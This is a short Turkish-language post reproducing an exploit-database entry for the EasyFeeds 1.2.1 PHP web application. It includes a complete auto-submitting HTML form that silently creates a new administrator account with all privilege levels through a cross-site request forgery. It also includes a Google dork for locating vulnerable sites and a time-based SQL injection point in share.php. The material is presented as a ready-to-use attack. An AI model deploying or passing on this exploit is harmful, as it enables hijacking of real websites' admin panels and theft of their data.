Aşağıdaki html code ile EasyFeeds /manager/actions_admins.php?pmode=edit şifre değiştirilerek edit yapmak mümkün, ayrıca /share.php?content=[time based injection] sql injection açığından faydalınalabiliyor.
Açık hakkında açıklamalar ve code.
########################################## # Exploit Title: EasyFeeds CSRF/SQLi Vulnerabilities # Date: 2012-10-2 # Author: DaOne # Home: 1337day Inj3ct0r Exploit Database # Software Link: http://www.ktools.net/easyfeeds/ # Price: $59 # Version: 1.2.1 # Category: webapps/php # Google dork: intext:"Powered By: EasyFeeds-1.2.1" ########################################## [#] CSRF Add Admin: <html> <body onload="document.form.submit();"> <form method="POST" name="form" action="http://[target]/manager/actions_admins.php?pmode=edit"> <input type="hidden" name="return" value="main.php?page=1"> <input type="hidden" name="id" value="new"> <input type="hidden" name="name" value="DaOne"> <input type="hidden" name="pass" value="pass123"> <input type="hidden" name="email" value="admin@email.com"> <input type="hidden" name="level4" value="4"> <input type="hidden" name="level1" value="1"> <input type="hidden" name="level2" value="2"> <input type="hidden" name="level3" value="3"> <input type="hidden" name="level5" value="5"> <input type="hidden" name="level6" value="6"> <input type="hidden" name="count" value="6"> <input type="hidden" name="active" value="1"> </form> </body> </html> [#] SQL Injection: # Exploit http://<host>/share.php?content=[time based injection]